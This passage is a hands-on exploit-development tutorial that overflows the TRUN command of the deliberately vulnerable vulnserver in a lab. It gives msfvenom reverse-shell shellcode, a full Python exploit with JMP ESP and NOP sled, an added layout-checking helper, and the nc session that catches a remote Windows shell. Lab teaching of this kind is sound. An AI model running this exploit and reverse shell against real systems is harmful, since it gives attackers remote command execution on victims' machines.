6.3 : Classic buffer overflow - Win32 buffer overflow (Part VIII)

7. Generate a reverse shell payload with Metasploit's msfvenom and append it to the buffer without blowing past the space we control (continued)

Let's get back to our Kali box. We use msfvenom to generate a reverse TCP shell that connects back to our machine.

If you are curious, msfvenom -l payloads lists every available payload (filtered here to the Windows ones).

root@kali:~/Desktop/exploits# msfvenom -l payloads | grep windows
    cmd/windows/adduser                                 Create a new user and add them to local administration group. Note: The specified password is checked for common complexity requirements to prevent the target machine rejecting the user for failing to meet policy requirements. Complexity check: 8-14 chars (1 UPPER, 1 lower, 1 digit/special)
    cmd/windows/bind_lua                                Listen for a connection and spawn a command shell via Lua
    cmd/windows/bind_perl                               Listen for a connection and spawn a command shell via perl (persistent)
    cmd/windows/bind_perl_ipv6                          Listen for a connection and spawn a command shell via perl (persistent)
    cmd/windows/bind_ruby                               Continually listen for a connection and spawn a command shell via Ruby
...



root@kali:~/Desktop/exploits# msfvenom --list f

Framework Executable Formats [--format <value>]
===============================================

    Name
    ----
    asp
    aspx
    aspx-exe
    axis2
    dll
    elf
    elf-so
    exe
    exe-only
    exe-service
    exe-small
    hta-psh
    jar
    jsp
    loop-vbs
    macho
    msi
    msi-nouac
    osx-app
    psh
    psh-cmd
    psh-net
    psh-reflection
    vba
    vba-exe
    vba-psh
    vbs
    war

Framework Transform Formats [--format <value>]
==============================================

    Name
    ----
    bash
    c
    csharp
    dw
    dword
    hex
    java
    js_be
    js_le
    num
    perl
    pl
    powershell
    ps1
    py
    python

Now generate a windows/shell_reverse_tcp payload:

root@kali:~/Desktop/exploits# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.56.101 LPORT=4444 EXITFUNC=thread -f c -a x86 --platform windows -b "\x00"
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 351 (iteration=0)
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes
Final size of c file: 1500 bytes
unsigned char buf[] =
"\xdb\xd7\xd9\x74\x24\xf4\x58\x33\xc9\xb1\x52\xbd\xb6\x50\xf4"
"\x0b\x83\xc0\x04\x31\x68\x13\x03\xde\x43\x16\xfe\xe2\x8c\x54"
"\x01\x1a\x4d\x39\x8b\xff\x7c\x79\xef\x74\x2e\x49\x7b\xd8\xc3"
"\x22\x29\xc8\x50\x46\xe6\xff\xd1\xed\xd0\xce\xe2\x5e\x20\x51"
"\x61\x9d\x75\xb1\x58\x6e\x88\xb0\x9d\x93\x61\xe0\x76\xdf\xd4"
"\x14\xf2\x95\xe4\x9f\x48\x3b\x6d\x7c\x18\x3a\x5c\xd3\x12\x65"
"\x7e\xd2\xf7\x1d\x37\xcc\x14\x1b\x81\x67\xee\xd7\x10\xa1\x3e"
"\x17\xbe\x8c\x8e\xea\xbe\xc9\x29\x15\xb5\x23\x4a\xa8\xce\xf0"
"\x30\x76\x5a\xe2\x93\xfd\xfc\xce\x22\xd1\x9b\x85\x29\x9e\xe8"
"\xc1\x2d\x21\x3c\x7a\x49\xaa\xc3\xac\xdb\xe8\xe7\x68\x87\xab"
"\x86\x29\x6d\x1d\xb6\x29\xce\xc2\x12\x22\xe3\x17\x2f\x69\x6c"
"\xdb\x02\x91\x6c\x73\x14\xe2\x5e\xdc\x8e\x6c\xd3\x95\x08\x6b"
"\x14\x8c\xed\xe3\xeb\x2f\x0e\x2a\x28\x7b\x5e\x44\x99\x04\x35"
"\x94\x26\xd1\x9a\xc4\x88\x8a\x5a\xb4\x68\x7b\x33\xde\x66\xa4"
"\x23\xe1\xac\xcd\xce\x18\x27\x32\xa6\x1a\xd2\xda\xb5\x5a\x0d"
"\x47\x33\xbc\x47\x67\x15\x17\xf0\x1e\x3c\xe3\x61\xde\xea\x8e"
"\xa2\x54\x19\x6f\x6c\x9d\x54\x63\x19\x6d\x23\xd9\x8c\x72\x99"
"\x75\x52\xe0\x46\x85\x1d\x19\xd1\xd2\x4a\xef\x28\xb6\x66\x56"
"\x83\xa4\x7a\x0e\xec\x6c\xa1\xf3\xf3\x6d\x24\x4f\xd0\x7d\xf0"
"\x50\x5c\x29\xac\x06\x0a\x87\x0a\xf1\xfc\x71\xc5\xae\x56\x15"
"\x90\x9c\x68\x63\x9d\xc8\x1e\x8b\x2c\xa5\x66\xb4\x81\x21\x6f"
"\xcd\xff\xd1\x90\x04\x44\xf1\x72\x8c\xb1\x9a\x2a\x45\x78\xc7"
"\xcc\xb0\xbf\xfe\x4e\x30\x40\x05\x4e\x31\x45\x41\xc8\xaa\x37"
"\xda\xbd\xcc\xe4\xdb\x97";

-p windows/shell_reverse_tcp : an unstaged reverse shell, so a plain nc listener is enough to catch it
LHOST / LPORT : our Kali address and the port nc will listen on
-a x86 --platform windows : 32-bit Windows shellcode, matching the vulnserver process
-f c : print the bytes as a C array, which is easy to paste into the script
-b "\x00" : treat NUL as a bad character; it is the C string terminator and would cut the payload short on the server side. Because a bad character was given, msfvenom picked the x86/shikata_ga_nai encoder, which is why the buffer starts with a decoder stub and is 351 bytes instead of the raw payload size
EXITFUNC=thread : when the shell exits, the payload calls ExitThread rather than ExitProcess, so only the thread that handled our connection dies and vulnserver keeps running for another attempt

Let's paste the generated shellcode into our script.
exploit.py

import socket

# vulnserver on the Windows VM, listening on TCP 9999
HOST = "192.168.56.102"
PORT = 9999


def probe(message):
    """
    Send one request to vulnserver.

    During fuzzing the failure is the interesting result (we want the crash).
    Once the shellcode runs, the server never answers and recv() times out,
    which is expected.

    :param message: request bytes
    :return: None
    """
    try:
        my_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        my_socket.connect((HOST, PORT))
        my_socket.settimeout(10)  # do not hang forever once the server is dead
        my_socket.recv(2048).decode()  # banner
        my_socket.send(message)
        res = my_socket.recv(2048).decode().replace("\n", "").replace("\r", "")
        my_socket.close()
        print("[success] %s:%s %d bytes => %s" % (HOST, PORT, len(message), res))
    except Exception:
        # print the length rather than the payload itself to keep the output readable
        print("[error] %s:%s %d bytes => None" % (HOST, PORT, len(message)))
        raise


def main():
    # JMP ESP in essfunc.dll at 0x625011AF, written little-endian
    shell = b"\xaf\x11\x50\x62"
    # shell = b"BBBB"  # use this instead to confirm EIP control

    # msfvenom windows/shell_reverse_tcp, 351 bytes, shikata_ga_nai, no \x00
    msf = (
        b"\xdb\xd7\xd9\x74\x24\xf4\x58\x33\xc9\xb1\x52\xbd\xb6\x50\xf4"
        b"\x0b\x83\xc0\x04\x31\x68\x13\x03\xde\x43\x16\xfe\xe2\x8c\x54"
        b"\x01\x1a\x4d\x39\x8b\xff\x7c\x79\xef\x74\x2e\x49\x7b\xd8\xc3"
        b"\x22\x29\xc8\x50\x46\xe6\xff\xd1\xed\xd0\xce\xe2\x5e\x20\x51"
        b"\x61\x9d\x75\xb1\x58\x6e\x88\xb0\x9d\x93\x61\xe0\x76\xdf\xd4"
        b"\x14\xf2\x95\xe4\x9f\x48\x3b\x6d\x7c\x18\x3a\x5c\xd3\x12\x65"
        b"\x7e\xd2\xf7\x1d\x37\xcc\x14\x1b\x81\x67\xee\xd7\x10\xa1\x3e"
        b"\x17\xbe\x8c\x8e\xea\xbe\xc9\x29\x15\xb5\x23\x4a\xa8\xce\xf0"
        b"\x30\x76\x5a\xe2\x93\xfd\xfc\xce\x22\xd1\x9b\x85\x29\x9e\xe8"
        b"\xc1\x2d\x21\x3c\x7a\x49\xaa\xc3\xac\xdb\xe8\xe7\x68\x87\xab"
        b"\x86\x29\x6d\x1d\xb6\x29\xce\xc2\x12\x22\xe3\x17\x2f\x69\x6c"
        b"\xdb\x02\x91\x6c\x73\x14\xe2\x5e\xdc\x8e\x6c\xd3\x95\x08\x6b"
        b"\x14\x8c\xed\xe3\xeb\x2f\x0e\x2a\x28\x7b\x5e\x44\x99\x04\x35"
        b"\x94\x26\xd1\x9a\xc4\x88\x8a\x5a\xb4\x68\x7b\x33\xde\x66\xa4"
        b"\x23\xe1\xac\xcd\xce\x18\x27\x32\xa6\x1a\xd2\xda\xb5\x5a\x0d"
        b"\x47\x33\xbc\x47\x67\x15\x17\xf0\x1e\x3c\xe3\x61\xde\xea\x8e"
        b"\xa2\x54\x19\x6f\x6c\x9d\x54\x63\x19\x6d\x23\xd9\x8c\x72\x99"
        b"\x75\x52\xe0\x46\x85\x1d\x19\xd1\xd2\x4a\xef\x28\xb6\x66\x56"
        b"\x83\xa4\x7a\x0e\xec\x6c\xa1\xf3\xf3\x6d\x24\x4f\xd0\x7d\xf0"
        b"\x50\x5c\x29\xac\x06\x0a\x87\x0a\xf1\xfc\x71\xc5\xae\x56\x15"
        b"\x90\x9c\x68\x63\x9d\xc8\x1e\x8b\x2c\xa5\x66\xb4\x81\x21\x6f"
        b"\xcd\xff\xd1\x90\x04\x44\xf1\x72\x8c\xb1\x9a\x2a\x45\x78\xc7"
        b"\xcc\xb0\xbf\xfe\x4e\x30\x40\x05\x4e\x31\x45\x41\xc8\xaa\x37"
        b"\xda\xbd\xcc\xe4\xdb\x97"
    )

    # 2006 bytes to reach EIP, the JMP ESP address, a 16-byte NOP sled so the
    # decoder stub does not overwrite itself, then the shellcode at ESP+16
    payload = b"TRUN ." + b"A" * 2006 + shell + b"\x90" * 16 + msf
    probe(payload)
    print("completed test")


if __name__ == "__main__":
    main()

Notice the 16 \x90 NOPs placed between the return address and the shellcode. After JMP ESP executes, ESP points at the byte right behind the overwritten return address, so that is where execution continues. The encoded payload begins with the shikata_ga_nai decoder stub (the \xdb\xd7\xd9\x74\x24\xf4\x58 at the start of the buffer: an FPU instruction, fnstenv [esp-0xc], pop eax, the usual GetPC trick). fnstenv stores a 28-byte FPU environment starting 12 bytes below ESP, which means it also writes the 16 bytes at and above ESP. If the shellcode started exactly at ESP, that store would overwrite the decoder's own first bytes and corrupt it before anything is decoded; the 16 NOPs absorb the write instead.
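Before firing the exploit it is worth checking the generated bytes mechanically rather than by eye: that the pasted C array really has the size msfvenom printed, that no bad character survived encoding, and that the NOP sled is long enough for the fnstenv write described above. The following is an added helper written for this page, not part of the original script. The offset (2006), the JMP ESP address (0x625011AF) and the 16-byte sled come from the walkthrough; the 28-byte fnstenv window is my reading of the decoder stub; the msfvenom text it parses is a constructed sample whose first hex line is the real prologue from the listing above and whose second line is a short made-up tail. With the page's 351-byte payload the same layout totals 6 + 2006 + 4 + 16 + 351 = 2383 bytes.

```python
import re

# Bad characters handed to msfvenom with -b; NUL terminates C strings on the
# server side, so it must not appear anywhere after the "TRUN ." prefix.
BAD_CHARS = b"\x00"

OFFSET_TO_EIP = 2006        # padding that lands the next 4 bytes on EIP (from the page)
JMP_ESP = 0x625011AF        # JMP ESP inside essfunc.dll (from the page)
NOP_SLED = 16               # the \x90s between the return address and the shellcode

# shikata_ga_nai prologue: fnstenv [esp-0xc] stores the 28-byte FPU environment
# at esp-12 .. esp+15, i.e. over the first 16 bytes at ESP (my analysis).
FNSTENV_ESP_MINUS_C = b"\xd9\x74\x24\xf4"
FNSTENV_DISP, FNSTENV_SIZE = -0x0C, 28

# Constructed sample of msfvenom "-f c" output (first hex line is real, the
# rest is made up so the parser has something to chew on offline).
SAMPLE_C_OUTPUT = r'''
Payload size: 22 bytes
Final size of c file: 120 bytes
unsigned char buf[] =
"\xdb\xd7\xd9\x74\x24\xf4\x58\x33\xc9\xb1\x52\xbd\xb6\x50\xf4"
"\x0b\x83\xc0\x04\x31\x68\x13";
'''


def parse_msfvenom_c(text):
    """Turn msfvenom -f c output back into the raw shellcode bytes."""
    body = text.split("unsigned char buf[] =", 1)[1]
    return bytes(int(h, 16) for h in re.findall(r"\\x([0-9a-fA-F]{2})", body))


def declared_payload_size(text):
    """The size msfvenom printed, used to cross-check the parsed length."""
    m = re.search(r"Payload size:\s*(\d+)\s*bytes", text)
    return int(m.group(1)) if m else None


def find_bad_chars(data, bad=BAD_CHARS):
    """Every (offset, value) in data that is a bad character."""
    return [(i, b) for i, b in enumerate(data) if b in bad]


def nop_padding_needed(shellcode):
    """Bytes that must sit between ESP and the shellcode so the decoder's
    fnstenv store cannot overwrite the shellcode. 0 if no such stub."""
    if FNSTENV_ESP_MINUS_C not in shellcode[:8]:
        return 0
    return max(0, FNSTENV_DISP + FNSTENV_SIZE)   # -12 + 28 = 16


def build_payload(shellcode, offset=OFFSET_TO_EIP, ret=JMP_ESP, nops=NOP_SLED):
    """Same layout as exploit.py: TRUN . | As | JMP ESP | NOPs | shellcode."""
    return (b"TRUN ." + b"A" * offset + ret.to_bytes(4, "little")
            + b"\x90" * nops + shellcode)


def check_layout(shellcode, offset=OFFSET_TO_EIP, nops=NOP_SLED):
    """Sanity checks to run before sending: bad chars, padding, total size."""
    payload = build_payload(shellcode, offset=offset, nops=nops)
    needed = nop_padding_needed(shellcode)
    return {
        "total_len": len(payload),
        "shellcode_len": len(shellcode),
        "bad_chars": find_bad_chars(payload[len(b"TRUN ."):]),
        "nops_needed": needed,
        "nops_ok": nops >= needed,
    }


if __name__ == "__main__":
    sc = parse_msfvenom_c(SAMPLE_C_OUTPUT)
    assert len(sc) == declared_payload_size(SAMPLE_C_OUTPUT)
    for key, value in check_layout(sc).items():
        print("%-14s %s" % (key, value))
```

To use it against the real output, paste the whole msfvenom listing into SAMPLE_C_OUTPUT (or read it from a file) and look at bad_chars and nops_ok before calling probe(); a non-empty bad_chars list means the encoder did not honour -b and the payload must be regenerated, and nops_ok False means the sled is shorter than the decoder's stack write.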

Back on Kali, start the nc listener on the LPORT we gave msfvenom, then run the script.

root@kali:~/Desktop/exploits# nc -lnvp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 192.168.56.102.
Ncat: Connection from 192.168.56.102:49602.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\IEUser\Desktop\vulnserver>ls
ls
LICENSE.TXT
README.TXT
README.md
Source
essfunc.dll
vulnserver.exe

C:\Users\IEUser\Desktop\vulnserver>ls
ls
LICENSE.TXT
README.TXT
README.md
Source
essfunc.dll
vulnserver.exe

C:\Users\IEUser\Desktop\vulnserver>whoami
whoami
iewin7\ieuser

C:\Users\IEUser\Desktop\vulnserver>

Got it.

Exploited.